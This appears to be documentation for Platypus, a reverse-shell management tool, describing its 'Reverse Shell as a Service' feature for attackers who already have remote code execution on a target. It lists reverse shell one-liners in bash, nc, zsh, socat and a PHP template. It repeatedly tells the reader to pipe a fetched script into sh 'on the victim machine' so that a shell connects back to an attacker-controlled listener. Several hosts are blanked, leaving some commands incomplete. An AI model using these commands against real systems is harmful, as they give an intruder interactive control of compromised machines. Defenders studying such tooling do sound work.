


本功能仅针对 *NIX 客户端,暂不支持 Windows。

Platypus is able to multiplex the reverse shell listening port. Port 13337 / 1338 can handle reverse shell client connections.
Also, There is another interesting feature that platypus provides, which is called Reverse Shell as a Service (RaaS).

Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like &, >. then this feature will be useful. Like you have already used before, here are some BAD examples:

nc -e /bin/bash 8080
bash -c 'bash -i >/dev/tcp/ 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

To archive your aim, all you need is to construct a URL that indicates the target.

The command bash -c "bash -i >/dev/tcp/ 0>&1" is the equivalent of curl | sh, this feature provides the capability to redirect a new reverse shell to another IP and port without remembering the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter ( can be omitted.

Once the command gets executed, the reverse shell session will appear in platypus which is listening on

Quick start

  1. Start platypus and listen to any port (eg: 13337)
  2. Execute curl | sh on the victim machine

Specifying language of reverse shell command (default: bash)

Also, you can specify the specific language of creating a reverse shell. All available languages are listed at templates

  1. Start platypus and listen to any port (eg: 13337)
  2. Execute curl | sh on the victim machine

What if I want to pop up the reverse shell to another IP ( and port (7331)?

By default, the new reverse shell will be popped up to the server which the port which the HTTP request sent, but you can simply change the IP and port by following these steps:

  1. Start platypus and listen to any port (eg: 13337)
  2. Execute curl | sh on the victim machine

How to add a new language

Currently, platypus support awk, bash, go, Lua, NC, Perl, PHP, python and ruby that were simply stolen from PayloadAllThings, and you can check templates folder to view all templates. Also, adding new language support is simple, just replace the real IP and port with __HOST__ and __PORT__.

php -r '$sock=fsockopen("__HOST__",`popen /bin/sh -i <&3 >&3 2>&3", "r");'`

Then you should use go-bindata to add the template file as an asset of Platypus by typing the following command.

go get -u github.com/go-bindata/go-bindata/...
go-bindata -pkg assets -o ./internal/util/assets/assets.go ./assets/config.example.yml ./assets/template/rsh/... ./web/ttyd/dist/... ./web/frontend/build/... ./build/termite/...